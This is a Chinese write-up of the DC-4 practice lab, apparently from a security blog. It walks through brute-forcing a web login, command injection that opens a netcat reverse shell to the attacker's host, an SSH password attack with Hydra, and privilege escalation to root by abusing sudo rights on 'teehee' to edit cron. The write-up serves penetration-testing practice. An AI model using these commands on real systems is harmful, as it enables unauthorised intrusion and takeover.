Part.
01
DC系列是一套很不错的新手练习靶场,考验了各种基础操作以及知识点。
首先这个靶场没有ifconfig命令,我们需要安装一下
apt install net-tools
然后我们访问这个页面,发现是一个登陆的窗口,其实是弱口令,我们使用burp进行爆破
这里我们因为根据字典的不同,账号是admin,密码是happy
我们利用获取的弱口令登录到后台,发现这里会执行命令查询,那么我们就可以抓包查看一下传递值
我修改一下这里的命令试试
这里+就是代表空格
成功加载了首页面出来,那么我们就来一个nc反弹吧,或者远程下载msf执行也是可以尝试的
nc 192.168.119.135 9989 -e /bin/bash
我们用+将上面的语句连接
然后攻击机开启nc接收,这样就成功反弹回来了
美化一下命令界面
我们查看权限,肯定是不足的
我们到home目录下查看一下
发现又三个人,也就是三个不同用户
我们可以检查一下每个用户目录中的文件,这里简化写
检查到jim中文件的backups目录的时候发现一个旧密码的文件
我们查看发现都是一些密码,我们将这个复制下来,保存到txt文件中
我们使用hydra来破解一下看看,爆破jim这个密码
hydra ssh://192.168.119.161 -l jim -P pd.txt -t 10
我们使用这个账号密码进行ssh登录
ssh jim@192.168.119.161
登录一下输入密码
登录上之后这里提示我们有一个邮件
我们查看这个jim
根据这个邮件我们找到关键的地方就是charles这个用户告诉了jim他的用户密码,也就是说我们可以登录这个用户
复制密码粘贴上去登录成功
我们使用
sudo -l
命令查看sudo能执行的命令
发现这个teehee又root权限
我们来使用设个teehee,使用它来编辑一下定时任务文件
写入让bin/sh赋予可读可写可执行权限
然后我们ctrl+退出编辑
使用
ls -la /bin/sh
验证一下
发现权限ok
那我们直接就可以使用bin/sh进行执行命令
那么到这里就完成了。
总结:
1、使用hydra进行爆破
2、了解一台Linux中不同用户在home下不同的文件夹
3、了解Linux中的邮件
4、使用了teehee进行定时任务编写获取权限
原文始发于微信公众号(白安全组):DC-4靶场练习(拯救基础学习)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论